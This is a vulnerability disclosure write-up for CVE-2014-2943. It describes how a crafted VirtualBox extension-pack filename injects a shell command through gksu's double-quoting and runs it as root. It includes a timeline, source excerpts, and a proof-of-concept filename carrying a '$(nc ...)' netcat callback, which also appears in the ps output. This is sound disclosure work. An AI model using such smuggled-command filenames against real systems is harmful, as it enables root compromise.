Poisoning VirtualBox via Crafted Filenames

When I began researching this, I believed the vulnerability laid within Virtualbox, but I realized this was not true after a bit. The vulnerability being hit is actually within gksu itself. In fact, virtual box did everything right (sort of). I do take advantage of a weakness in the way they validate their extension packs, but the reason the vulnerability results in a root shell is because the vulnerability is hit after gksu escalates privs to root. You must install the extension pack via the helper app, so that means double clicking or opening from the graphical UI. This also works when reinstalling the same (but maliciously-renamed) extension pack.

Incidentally, this bug was already reported in the maintainer's bug tracker, but it seems unclear of the true, dangerous scope of the bug, when it comes to things like VirtualBox, various package manageres, et cetera.

Disclosure Timeline

Below is the timeline Brandon Perry and Rapid7 followed to disclose this issue.

Date Action
Aug 15, 2013 (Thu) Vulnerable behavior first noticed (approximately)
Apr 28, 2014 (Wed) Submitted to HP's ZDI program for consideration
Apr 30, 2014 (Wed) Entrusted to Rapid7 for disclosure
May 21, 2014 (Wed) Disclosed to vendor, Gustavo Nohornha Silva
Jun 06, 2014 (Fri) Disclosed to CERT/CC
Jun 10, 2014 (Tue) CVE-2014-2943 assigned
Jul 07, 2014 (Mon) Public Disclosure

Vulnerability Details

A linux system with KDE installed will likely not be vulnerable to this, as the code path to use gksu asks if kdesudo is installed before asking if gksu is installed. The logic that dictates this is within VBoxExtPackHelperApp.cpp around line 1429. Per the comment above the logic, this will likely be fixed for Virtualbox if it is rewritten to use PolicyKit.

In order to hit the vulnerability on a default Ubuntu install, you must change the ‘sudo-mode' key to be unchecked in the /apps/gksu schema in gconf which will make gksu require the ‘root' user's password as opposed to the current user's password since it will achieve privilege escalation using ‘su' and not ‘sudo'. On CentOS, for instance, this is not needed as this is default.

The vulnerability lies in the filename. At the time of writing, there is only one known VirtualBox extension pack. It is offered by Oracle on their website along with the virtual box installer. This adds proprietary functionality. It is called:

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack

When Virtualbox is opening this, it checks the filename against a stored value within the ext pack and ensures they match. If they do not, then virtual box bails. You can get around this, however, with a little bit of trickery.

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack.fdsa.vbox-extpack

By appending directly to the end, you can bypass the filename check. By appending an extra .vbox-extpack, an administrator can still double click the file and have the window manager open virtual box to install the extension pack.

In order to take advantage of the vulnerability in gksu, you can create a small test that connects back with a netcat session.

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack.$(nc 192.168.1.99 4444).vbox-extpack

By passing this to gksu, gksu will pass the payload to ‘gksu-run-helper' as an argument in “double” quotes. When gksu executes the gksu-run-helper command as root, the payload is evaluated within the double quotes (even though virtualbox single quoted them!).

Within the gksu_su_fuller function in libgksu.c ~line 1928, you will find gksu builds the string that it will be eventually running. ~line 1996 and 1997 looks like this:

1996      cmd[i] = g_strdup_printf ("%s \"%s\"", auxcommand,
1997        context->command); i++;

auxcommand is ‘gksu-run-helper' and context->command is the command that will be run in the context of the root user. You can see that it uses “double” quotes to encapsulate the command.

Here is a ps aux listing of what the execution progression is, note the increasing pids:

bperry    9708  0.0  0.4 106352  4272 ?        S    19:23  0:00 /usr/lib/virtualbox/VBoxExtPackHelperApp install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name Oracle VM VirtualBox Extension Pack --tarball /home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ext pack.$(nc 192.168.1.31 4444).vbox-extpack --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace
 
 
bperry    9710  1.6  1.0 186440 11100 ?        S    19:23  0:00 /usr/bin/gksu /usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace
 
 
root      9715  0.0  0.1  59928  1780 pts/2    Ss+  19:23  0:00 /bin/su root -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace"
 
 
root      9724  0.0  0.1  12380  1252 ?        Ss  19:24  0:00 bash -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace"
 
 
root      9725  0.0  0.0  12380  672 ?        S    19:24  0:00 bash -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace"

The above output was taken while virtual box was frozen because I had not dropped the connection made between the vm and another machine(you can try this yourself). The last command run is the gksu-run-helper command with our command in “double” quotes. If you hit the vulnerability properly, the bash metacharacters will not appear in the final command ran, and virtual box will error out because the file it is looking for will not exist (unless the attacker can create it?).

This vulnerability could easily affect other applications that users must escalate privileges for to use (package managers come to mind). Using this method, attackers could craft special files that match MD5 sums, but that are actually quite malicious with bash metacharacters hidden in them that get parsed as root.

You may watch a short video detailing and demoing the vuln on YouTube: